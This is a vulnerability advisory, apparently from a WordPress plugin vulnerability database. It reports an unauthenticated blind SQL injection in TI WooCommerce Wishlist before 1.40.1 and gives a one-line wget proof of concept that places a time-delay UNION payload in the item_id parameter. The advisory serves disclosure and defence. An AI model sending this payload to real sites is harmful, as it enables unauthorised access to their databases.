WordPress Plugin Vulnerabilities
TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection
Description
The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks
Proof of Concept
time wget 'https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(2)%20--%20g' Even though it will produce an error 400, the payload is processed and response delayed
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-01-31 (about 2 years ago)
Added
2022-01-31 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)